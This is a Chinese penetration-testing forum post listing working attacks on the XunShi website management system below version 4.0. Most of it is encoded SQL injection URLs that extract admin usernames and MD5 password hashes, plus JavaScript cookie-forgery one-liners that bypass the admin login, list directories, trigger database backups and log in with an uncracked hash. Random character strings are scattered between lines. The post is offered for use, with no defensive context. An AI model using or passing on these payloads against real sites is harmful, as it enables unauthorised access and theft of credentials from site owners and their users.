中国网络渗透测试联盟
标题:
讯时网站管理系统4.0以下漏洞
[打印本页]
作者:
admin
时间:
2016-5-11 14:55
标题:
讯时网站管理系统4.0以下漏洞
一、注入
" O. Q- N3 T% k$ k7 i
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
+ {/ R1 F- X) E- J7 h q, w) Q
6 `# J5 O1 u- W
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
$ L1 W7 A" r5 v6 Y1 o( E% e8 h: M
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
" |( V4 W7 I! U) W" D$ L2 \3 E' t+ i
可得到用户名和MD5加密码的密码。
/ s/ M5 Q. @" \% o/ D: y. h
4 H" _, P4 w' k
二、cookies欺骗
8 q1 `( u v& p( `- o# A; E! m
" i; |$ e; p( a- K1 a
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
- y" B* y6 n# H2 x- {2 b
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
7 _, n) f2 z& w d% [4 L5 x n( F
# ~$ e! p8 W" p
2、列目录.
+ B' d5 B9 W8 Q% S; H I
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
6 u4 B- I' V( s: O+ P$ [
) a! ^* P! s+ \& @& z5 Q" H
3、数据库备份(适用性好像比较低.)
4 P3 f! G% w& o" e& i1 R
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
; s! R2 ]% c, p2 o" S$ Q
- G5 V% P1 z1 G' e6 S
4、得到MD5密码解不了密进后台方法
5 u: E& Z' P, g4 k# K/ j0 W7 a
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
' T0 [, b: b* W. }
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2